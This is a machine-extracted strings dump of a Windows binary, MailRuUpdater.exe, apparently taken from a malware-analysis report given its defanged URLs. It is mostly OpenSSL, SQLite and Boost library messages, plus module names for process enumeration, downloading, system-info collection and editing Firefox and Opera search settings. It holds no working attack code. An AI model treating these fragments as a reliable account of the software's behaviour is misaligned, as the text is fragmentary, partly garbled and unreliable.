u.cols >= nm && vt.rows >= nm && (w.size() == Size(nm, 1) || w.size() == Size(1, nm) || w.size() == Size(vt.rows, u.cols))
rhs.data == 0 || (rhs.type() == type && rhs.rows == m)
D:\Libs\opencv\sources\modules\core\src\persistence.cpp
-.Inf
An attempt to add element without a key to a map, or add element with key to sequence
The key is an empty
The key is too long
Key must start with a letter or _
Key names may only contain alphanumeric characters [a-zA-Z0-9], '-', '_' and ' '
Key should start with a letter or _
Key name may only contain alphanumeric characters [a-zA-Z0-9], '-' and '_'
elements with keys can not be written to sequence
Images with planar data layout are not supported
2if%s
ß%s
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
0123456789-
%b %d %H : %M : %S %Y
%m / %d / %y
%I : %M : %S %p
%d / %m / %y
The repeat operator "*" cannot start a regular expression.
The repeat operator "?" cannot start a regular expression.
The repeat operator " " cannot start a regular expression.
Found a closing repetition operator } with no corresponding {.
Can't terminate a sub-expression with an alternation operator |.
The \c and \C escape sequences are not supported by POSIX basic regular expressions: try the Perl syntax instead.
A regular expression can start with the alternation operator |.
Invalid alternation operators within (?...) block.
More than one alternation operator | was encountered inside a conditional expression.
Alternation operators are not allowed inside a DEFINE block.
A repetition operator cannot be applied to a zero-width assertion.
left-curly-bracket
right-curly-bracket
0123456789
Unmatched quantified repeat operator { or \{.
Invalid preceding regular expression prior to repetition operator.
boost::filesystem::directory_iterator::operator  
boost thread: trying joining itself
Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag
libs\log\src\code_conversion.cpp
libs\log\src\global_logger_storage.cpp
libs\log\src\attribute_name.cpp
[u-u-u u:u:u.u] [%s] %s %s
[u-u-u u:u:u.u] [%s] %s %ls
libs\log\src\thread_specific.cpp
Resource.cpp
%Y-%m-%d %H:%M:%S
en_US.UTF-8
log_ng.cpp
mailru::log_ng::ExecutionTimeLogger::~ExecutionTimeLogger
is_admin.cpp
c:\desktop_apps\sputniklib\auto_handle.hpp
process_enumerate.cpp
GetModuleFileNameEx succeed %s
Path.cpp
remote_config.cpp
string.cpp
version_info.cpp
AccountInfo.cpp
mailru::sqlite::database::database
sqlite.cpp
<>"#%{}|\^~[] ?&@=:,
hXXp://
hXXps://
process_util.cpp
unzip.cpp
filesystem_utils.cpp
mailru::firefox_js_core::load_prefs_js
firefox_js.cpp
!"#$%&'(
)* ,-./0123
encryption.cpp
testing_env.cpp
SessionsInfo.cpp
mailru::WaitForUserLogIn
Suggest URL
mailru::opera::searchini::save
opera_searchini.cpp
sync_objects.cpp
uninstall_manager.cpp
mailru::url_parser::init
url_parser.cpp
system_info\system_info_collector.cpp
crash_handler.cpp
shortcut.cpp
thread.entry_event
thread.exit_event
mailru::http::request_headers::get_header
C:\desktop_apps\SputnikLib/http_downloader.h
HTTP/1.1
^HTTP/1.1 (\d ) (. )
mailru::http::response_headers::response_headers
mailru::http::response_headers::get_file_time
http_downloader.cpp
mailru::http::downloader_impl::connection_data_file::~connection_data_file
mailru::http::downloader_impl::handle_read_headers
mailru::http::raw::downloader::fetch_file_attributes
HTTP error %2%: %3%
mailru::http::fetch_wstring_via_tempfile
system_info\system_info.cpp
s-sputnik.mail.ru
hXXps://VVV.geotrust.com/resources/root_certificates/certificates/Equifax_Secure_Certificate_Authority.pem
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----
255.255.255.255
asio.ssl
asio.ssl error
add_certificate_authority
https
HTTP error:
caching_policy.cpp
task_scheduler.cpp
Line %d, Column %d
Visual C   CRT: Not enough memory to complete call to strerror.
%S#[k
?#%X.y
MaxPolicyElementKey
Operation not permitted
Inappropriate I/O control operation
Broken pipe
operator
GetProcessWindowStation
pExecutionResource
SQLite format 3
3.7.11
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY
CREATE TABLE sqlite_master(
sql text
CREATE TEMP TABLE sqlite_temp_master(
foreign_keys
sqlite_rename_table
sqlite_rename_trigger
sqlite_rename_parent
sqlite_stat1
SQL logic error or missing database
unknown operation
large file support is disabled
RowKey
sqlite_detach
sqlite_attach
sqlite_version
sqlite_source_id
sqlite_log
sqlite_compileoption_used
sqlite_compileoption_get
SQLITE_
d-d-d d:d:d
d:d:d
d-d-d
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
922337203685477580
API call with %s database connection pointer
OsError 0x%x (%u)
os_win.c:%d: (%d) %s(%s) - %s
delayed %dms for lock/sharing conflict
%s-shm
%s\etilqs_
Recovered %d frames from WAL file %s
cannot limit WAL size: %s
invalid page number %d
2nd reference to page %d
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
%d of %d pages missing from overflow list starting at %d
failed to get page %d
freelist leaf count too big on page %d
Page %d:
unable to get the page. error code=%d
btreeInitPage() returns error code %d
On tree page %d cell %d:
On page %d at right child:
Corruption detected in cell %d on page %d
Multiple uses for byte %d of page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
unknown database %s
keyinfo(%d
%s(%d)
%s-mjXXXXXX9XXz
MJ delete: %s
MJ collide: %s
-mjX9X
foreign key constraint failed
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
zeroblob(%d)
abort at %d in [%s]: %s
constraint failed at %d in [%s]
cannot open savepoint - SQL statements in progress
no such savepoint: %s
cannot release savepoint - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot change %s wal mode from within a transaction
database table is locked: %s
statement aborts at %d: [%s] %s
cannot open value of type %s
cannot open virtual table: %s
cannot open view: %s
no such column: "%s"
foreign key
indexed
cannot open %s column for writing
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s.%s
%s: %s
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
too many SQL variables
too many columns in %s
EXECUTE %s%s SUBQUERY %d
misuse of aggregate: %s()
%.*s"%w"%s
%s%.*s"%w"
%s OR name=%Q
type='trigger' AND (%s)
sqlite_
table %s may not be altered
there is already another table or index with this name: %s
view %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_altertab_%s
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
invalid name: "%s"
too many attached databases - max %d
database %s is already in use
unable to open database: %s
no such database: %s
cannot detach database %s
database %s is locked
%s %T cannot reference objects in database %s
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
there is already an index named %s
too many columns on %s
duplicate column name: %s
default value of column [%s] is not constant
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
no such collation sequence: %s
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
view %s is circularly defined
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
sqlite_stat%d
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
sqlite_stat
table %s may not be dropped
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
foreign key on %s should reference only one column of table %T
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
indexed columns are not unique
table %s may not be indexed
views may not be indexed
virtual tables may not be indexed
there is already a table named %s
index %s already exists
sqlite_autoindex_%s_%d
table %s has no column named %s
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
no such index: %S
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
a JOIN clause is required before %s
unable to identify the object to be reindexed
table %s may not be modified
cannot modify %s because it is a view
foreign key mismatch
table %S has %d columns but %d values were supplied
%d values for %d columns
table %S has no column named %s
%s.%s may not be NULL
PRIMARY KEY must be unique
sqlite3_extension_init
unable to open shared library [%s]
no entry point [%s] in shared library [%s]
error during initialization: %s
automatic extension loading failed: %s
foreign_key_list
*** in database %s ***
unsupported encoding: %s
malformed database schema (%s)
%s - %s
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
database schema is locked: %s
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
%s.%s
%s:%d
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
SELECTs to the left and right of %s do not have the same number of result columns
no such index: %s
sqlite_subquery_%p_
no such table: %s
SCAN TABLE %s %s%s(~%d rows)
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
no such trigger: %S
-- TRIGGER %s
no such column: %s
cannot VACUUM - SQL statements in progress
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor failed: %s
vtable constructor did not declare schema: %s
no such module: %s
table %s: xBestIndex returned an invalid plan
%s SUBQUERY %d
%s TABLE %s
%s AS %s
%s USING %s%sINDEX%s%s%s
%s USING INTEGER PRIMARY KEY
%s (rowid=?)
%s (rowid>? AND rowid<?)
%s (rowid>?)
%s (rowid<?)
%s VIRTUAL TABLE INDEX %d:%s
%s (~%lld rows)
at most %d tables in a join
cannot use index: %s
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
unable to close due to unfinished backup operation
unknown database: %s
no such %s mode: %s
%s mode not allowed: %s
no such vfs: %s
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
c:\desktop_apps\3party\ticpp\ticpp.h
ticpp.cpp
Type is unsupported
&#xX;
</%s>
%s="%s"
%s='%s'
<!--%s-->
<![CDATA[%s]]>
version="%s"
encoding="%s"
standalone="%s"
type="%s"
href="%s"
unsupported version
.UTF-8
.windows-
windows1250
windows1251
windows1252
windows1253
windows1254
windows1255
windows1256
windows1257
windows874
windows932
windows936
Invalid or unsupported charset:
1.2.5
<fd:%d>
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
inflate 1.2.5 Copyright 1995-2010 Mark Adler
RSA PRIVATE KEY
PUBLIC KEY
DSA PRIVATE KEY
EC PRIVATE KEY
NETSCAPE_CERT_SEQUENCE
RIPE-MD160 part of OpenSSL 1.0.0g 18 Jan 2012
SHA part of OpenSSL 1.0.0g 18 Jan 2012
MD4 part of OpenSSL 1.0.0g 18 Jan 2012
CAST part of OpenSSL 1.0.0g 18 Jan 2012
Blowfish part of OpenSSL 1.0.0g 18 Jan 2012
:RC2 part of OpenSSL 1.0.0g 18 Jan 2012
.pp@0
aEÐ
 (#EÚ
ÚE<<0
IDEA part of OpenSSL 1.0.0g 18 Jan 2012
libdes part of OpenSSL 1.0.0g 18 Jan 2012
DES part of OpenSSL 1.0.0g 18 Jan 2012
3OpenSSL 1.0.0g 18 Jan 2012
GOST signature length is %d
.\ssl\ssl_cert.c
%-23s %s Kx=%-8s Au=%-4s Enc=%-9s Mac=%-4s%s
EXPORT56
EXPORT40
EXPORT
wrong number of key bits
unsupported status type
unsupported ssl version
unsupported protocol
unsupported elliptic curve
unsupported digest type
unsupported compression algorithm
unsupported cipher
unknown pkey type
unknown key exchange type
unknown certificate type
unable to find public key parameters
unable to extract public key
unable to decode ecdh certs
unable to decode dh certs
tried to use unsupported cipher
tls peer did not respond with certificate list
tls client cert req with anon cipher
tlsv1 unsupported extension
tlsv1 certificate unobtainable
tlsv1 bad certificate status response
tlsv1 bad certificate hash value
tlsv1 alert export restriction
sslv3 alert unsupported certificate
sslv3 alert no certificate
sslv3 alert certificate unknown
sslv3 alert certificate revoked
sslv3 alert certificate expired
sslv3 alert bad certificate
signature for non signing certificate
reuse cert type not zero
reuse cert length not zero
public key not rsa
public key is not rsa
public key encrypt error
peer error unsupported certificate type
peer error no certificate
peer error certificate
peer did not return a certificate
null ssl method passed
no publickey
no private key assigned
no privatekey
Peer haven't sent GOST certificate, required for selected ciphersuite
no client cert received
no client cert method
no ciphers passed
no certificate specified
no certificate set
no certificate returned
no certificate assigned
no certificates returned
missing tmp rsa pkey
missing tmp rsa key
missing tmp ecdh key
missing tmp dh key
missing rsa signing cert
missing rsa encrypting cert
missing rsa certificate
missing export tmp rsa key
missing export tmp dh key
missing dsa signing cert
missing dh rsa cert
missing dh key
missing dh dsa cert
krb5 server rd_req (keytab perms?)
key arg too long
invalid ticket keys length
http request
https proxy request
error generating tmp rsa key
ecc cert should have sha1 signature
ecc cert should have rsa signature
ecc cert not for signing
ecc cert not for key agreement
cert length mismatch
certificate verify failed
bad ecc cert
bad dh pub key length
TLS1_SETUP_KEY_BLOCK
tls1_cert_verify_mac
SSL_VERIFY_CERT_CHAIN
SSL_use_RSAPrivateKey_file
SSL_use_RSAPrivateKey_ASN1
SSL_use_RSAPrivateKey
SSL_use_PrivateKey_file
SSL_use_PrivateKey_ASN1
SSL_use_PrivateKey
SSL_use_certificate_file
SSL_use_certificate_ASN1
SSL_use_certificate
SSL_SET_PKEY
SSL_SET_CERT
SSL_SESS_CERT_NEW
SSL_GET_SIGN_PKEY
SSL_GET_SERVER_SEND_CERT
SSL_CTX_use_RSAPrivateKey_file
SSL_CTX_use_RSAPrivateKey_ASN1
SSL_CTX_use_RSAPrivateKey
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_PrivateKey_ASN1
SSL_CTX_use_PrivateKey
SSL_CTX_use_certificate_file
SSL_CTX_use_certificate_chain_file
SSL_CTX_use_certificate_ASN1
SSL_CTX_use_certificate
SSL_CTX_set_client_cert_engine
SSL_CTX_check_private_key
SSL_CHECK_SRVR_ECC_CERT_AND_ALG
SSL_check_private_key
SSL_CERT_NEW
SSL_CERT_INSTANTIATE
SSL_CERT_INST
SSL_CERT_DUP
SSL_add_file_cert_subjects_to_stack
SSL_add_dir_cert_subjects_to_stack
SSL3_SETUP_KEY_BLOCK
SSL3_SEND_SERVER_KEY_EXCHANGE
SSL3_SEND_SERVER_CERTIFICATE
SSL3_SEND_CLIENT_KEY_EXCHANGE
SSL3_SEND_CLIENT_CERTIFICATE
SSL3_SEND_CERTIFICATE_REQUEST
SSL3_OUTPUT_CERT_CHAIN
SSL3_GET_SERVER_CERTIFICATE
SSL3_GET_KEY_EXCHANGE
SSL3_GET_CLIENT_KEY_EXCHANGE
SSL3_GET_CLIENT_CERTIFICATE
SSL3_GET_CERT_VERIFY
SSL3_GET_CERT_STATUS
SSL3_GET_CERTIFICATE_REQUEST
SSL3_GENERATE_KEY_BLOCK
SSL3_CHECK_CERT_AND_ALGORITHM
SSL3_ADD_CERT_TO_BUF
SSL2_SET_CERTIFICATE
SSL2_GENERATE_KEY_MATERIAL
REQUEST_CERTIFICATE
GET_CLIENT_MASTER_KEY
DTLS1_SEND_SERVER_KEY_EXCHANGE
DTLS1_SEND_SERVER_CERTIFICATE
DTLS1_SEND_CLIENT_KEY_EXCHANGE
DTLS1_SEND_CLIENT_CERTIFICATE
DTLS1_SEND_CERTIFICATE_REQUEST
DTLS1_OUTPUT_CERT_CHAIN
DTLS1_ADD_CERT_TO_BUF
CLIENT_MASTER_KEY
CLIENT_CERTIFICATE
SSLv2 part of OpenSSL 1.0.0g 18 Jan 2012
s->session->master_key_length >= 0 && s->session->master_key_length < (int)sizeof(s->session->master_key)
c->iv_len <= (int)sizeof(s->session->key_arg)
s->s2->key_material_length <= sizeof s->s2->key_material
SSLv3 part of OpenSSL 1.0.0g 18 Jan 2012
TLSv1 part of OpenSSL 1.0.0g 18 Jan 2012
os.length <= (int)sizeof(ret->session_id)
DTLSv1 part of OpenSSL 1.0.0g 18 Jan 2012
key expansion
client write key
server write key
%s:%d: rec->data != rec->input
libs\log\src\text_file_backend.cpp
%H:%M:%S.%f
.\crypto\engine\eng_pkey.c
Load certs from files in a directory
%s%clx.%s%d
unsupported type
unsupported recpientinfo type
unsupported recipient type
unsupported kek algorithm
unsupported content type
signer certificate not found
private key does not match certificate
no public key
no private key
no msgsigdigest
no key or cert
no key
not supported for this key type
not key transport
msgsigdigest wrong length
msgsigdigest verification failure
msgsigdigest error
invalid key length
invalid encrypted key length
error setting key
error getting public key
certificate verify error
certificate has no keyid
certificate already present
CMS_SIGNERINFO_VERIFY_CERT
CMS_RecipientInfo_set0_pkey
CMS_RecipientInfo_set0_key
CMS_RecipientInfo_ktri_cert_cmp
cms_msgSigDigest_add1
CMS_GET0_CERTIFICATE_CHOICES
CMS_EncryptedData_set1_key
CMS_decrypt_set1_pkey
CMS_decrypt_set1_key
CMS_add1_recipient_cert
CMS_add0_recipient_key
CMS_add0_cert
unsupported requestorname type
no certificates in chain
error parsing url
PARSE_HTTP_LINE1
OCSP_parse_url
OCSP_cert_id_new
unimplemented public key method
invalid cmd number
invalid cmd name
failed loading public key
failed loading private key
cmd not executable
ENGINE_UNLOAD_KEY
ENGINE_load_ssl_client_cert
ENGINE_load_public_key
ENGINE_load_private_key
ENGINE_get_pkey_meth
ENGINE_get_pkey_asn1_meth
ENGINE_ctrl_cmd_string
ENGINE_ctrl_cmd
ENGINE_cmd_is_executable
unsupported md algorithm
invalid signer certificate purpose
ess signing certificate error
ess add signing cert error
TS_VERIFY_CERT
TS_TST_INFO_set_msg_imprint
TS_RESP_CTX_set_signer_cert
TS_RESP_CTX_set_certs
TS_REQ_set_msg_imprint
TS_MSG_IMPRINT_set_algo
TS_CHECK_SIGNING_CERTS
ESS_SIGNING_CERT_NEW_INIT
ESS_CERT_ID_NEW_INIT
ESS_ADD_SIGNING_CERT
functionality not supported
WIN32_JOINER
unsupported pkcs12 mode
key gen error
PKCS8_add_keyusage
PKCS12_PBE_keyivgen
PKCS12_newpass
PKCS12_MAKE_SHKEYBAG
PKCS12_MAKE_KEYBAG
PKCS12_key_gen_uni
PKCS12_key_gen_asc
PKCS12_add_localkeyid
unsupported option
unable to get issuer keyid
policy syntax not currently supported
operation not defined
no proxy cert policy language defined
no issuer certificate
extension setting not supported
V2I_EXTENDED_KEY_USAGE
V2I_AUTHORITY_KEYID
S2I_SKEY_ID
S2I_ASN1_SKEY_ID
R2I_CERTPOL
unsupported cipher type
unable to find certificate
signing not supported for this key type
operation not supported on this type
no recipient matches key
no recipient matches certificate
encryption not supported for this key type
decrypted key is wrong length
PKCS7_add_certificate
unsupported method
no port specified
no port defined
no accept port specified
BIO_get_port
ECDH_compute_key
data too large for key size
unsupported field
passed null parameter
not a supported NIST prime
missing private key
keys not set
invalid private key
PKEY_EC_SIGN
PKEY_EC_PARAMGEN
PKEY_EC_KEYGEN
PKEY_EC_DERIVE
PKEY_EC_CTRL_STR
PKEY_EC_CTRL
o2i_ECPublicKey
i2o_ECPublicKey
i2d_ECPrivateKey
EC_KEY_print_fp
EC_KEY_print
EC_KEY_new
EC_KEY_generate_key
EC_KEY_copy
EC_KEY_check_key
ECKEY_TYPE2PARAM
ECKEY_PUB_ENCODE
ECKEY_PUB_DECODE
ECKEY_PRIV_ENCODE
ECKEY_PRIV_DECODE
ECKEY_PARAM_DECODE
ECKEY_PARAM2TYPE
DO_EC_KEY_PRINT
d2i_ECPrivateKey
zlib not supported
wrong public key type
unsupported public key type
unsupported encryption algorithm
unsupported any defined by type
unknown public key type
unable to decode rsa private key
unable to decode rsa key
streaming not supported
private key header missing
digest and key type not supported
bad password read
X509_PKEY_new
i2d_RSA_PUBKEY
i2d_PublicKey
i2d_PrivateKey
i2d_EC_PUBKEY
i2d_DSA_PUBKEY
d2i_X509_PKEY
d2i_PublicKey
d2i_PrivateKey
d2i_AutoPrivateKey
unsupported algorithm
unknown key type
unable to get certs public key
public key encode error
public key decode error
no cert set for us to verify
method not supported
loading cert dir
key values mismatch
key type mismatch
cert already in hash table
cant check dh key
X509_verify_cert
X509_STORE_add_cert
X509_REQ_check_private_key
X509_PUBKEY_set
X509_PUBKEY_get
X509_load_cert_file
X509_load_cert_crl_file
X509_get_pubkey_parameters
X509_check_private_key
GET_CERT_BY_SUBJECT
ADD_CERT_DIR
PKEY_DSA_KEYGEN
PKEY_DSA_CTRL
unsupported key components
unsupported encryption
read key
public key no rsa
problems getting password
keyblob too short
keyblob header parse error
expecting public key blob
expecting private key blob
error converting private key
PEM_WRITE_PRIVATEKEY
PEM_READ_PRIVATEKEY
PEM_READ_BIO_PRIVATEKEY
PEM_PK8PKEY
PEM_F_PEM_WRITE_PKCS8PRIVATEKEY
DO_PK8PKEY_FP
DO_PK8PKEY
d2i_PKCS8PrivateKey_fp
d2i_PKCS8PrivateKey_bio
unsupported salt type
unsupported private key algorithm
unsupported prf
unsupported key size
unsupported key derivation function
unsupported keylength
unsuported number of rounds
private key encode error
private key decode error
operaton not initialized
operation not supported for this keytype
no operation set
no key set
keygen failure
invalid operation
expecting a ec key
expecting a ecdsa key
expecting a dsa key
expecting a dh key
expecting an rsa key
different key types
ctrl operation not implemented
command not supported
camellia key setup failed
bn pubkey error
bad key length
aes key setup failed
PKEY_SET_TYPE
PKCS5_v2_PBE_keyivgen
PKCS5_PBE_keyivgen
EVP_PKEY_verify_recover_init
EVP_PKEY_verify_recover
EVP_PKEY_verify_init
EVP_PKEY_verify
EVP_PKEY_sign_init
EVP_PKEY_sign
EVP_PKEY_paramgen_init
EVP_PKEY_paramgen
EVP_PKEY_new
EVP_PKEY_keygen_init
EVP_PKEY_keygen
EVP_PKEY_get1_RSA
EVP_PKEY_get1_EC_KEY
EVP_PKEY_GET1_ECDSA
EVP_PKEY_get1_DSA
EVP_PKEY_get1_DH
EVP_PKEY_encrypt_old
EVP_PKEY_encrypt_init
EVP_PKEY_encrypt
EVP_PKEY_derive_set_peer
EVP_PKEY_derive_init
EVP_PKEY_derive
EVP_PKEY_decrypt_old
EVP_PKEY_decrypt_init
EVP_PKEY_decrypt
EVP_PKEY_CTX_dup
EVP_PKEY_CTX_ctrl_str
EVP_PKEY_CTX_ctrl
EVP_PKEY_copy_parameters
EVP_PKEY2PKCS8_broken
EVP_PKCS82PKEY_BROKEN
EVP_PKCS82PKEY
EVP_CIPHER_CTX_set_key_length
ECKEY_PKEY2PKCS8
ECDSA_PKEY2PKCS8
DSA_PKEY2PKCS8
DSAPKEY2PKCS8
D2I_PKEY
CAMELLIA_INIT_KEY
AES_INIT_KEY
invalid public key
PKEY_DH_KEYGEN
PKEY_DH_DERIVE
GENERATE_KEY
COMPUTE_KEY
rsa operations not supported
key size too small
invalid keybits
illegal or unsupported padding mode
digest too big for rsa key
data too small for key size
RSA_generate_key
RSA_check_key
RSA_BUILTIN_KEYGEN
PKEY_RSA_VERIFYRECOVER
PKEY_RSA_SIGN
PKEY_RSA_CTRL_STR
PKEY_RSA_CTRL
.\crypto\asn1\x_pkey.c
C:\desktop_apps\_out\MailRuUpdater.pdb
MailRuUpdater.exe
??0?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@QAE@XZ
??0?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@QAE@XZ
??0?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@QAE@XZ
??_B?1??get_instance@?$singleton@V?$extended_type_info_typeid@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@serialization@boost@@@serialization@boost@@CAAAV?$extended_type_info_typeid@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@23@XZ@51
??_B?1??get_instance@?$singleton@V?$extended_type_info_typeid@UProcessKey@sysinfo@mailru@@@serialization@boost@@@serialization@boost@@CAAAV?$extended_type_info_typeid@UProcessKey@sysinfo@mailru@@@23@XZ@51
??_B?1??get_instance@?$singleton@V?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@serialization@boost@@@serialization@boost@@CAAAV?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@23@XZ@51
??_B?1??get_instance@?$singleton@V?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@serialization@boost@@CAAAV?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@3@XZ@51
??_B?1??get_instance@?$singleton@V?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@serialization@boost@@CAAAV?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@3@XZ@51
??_B?1??get_instance@?$singleton@V?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@serialization@boost@@CAAAV?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@3@XZ@51
??_B?1??get_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@CAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ@51
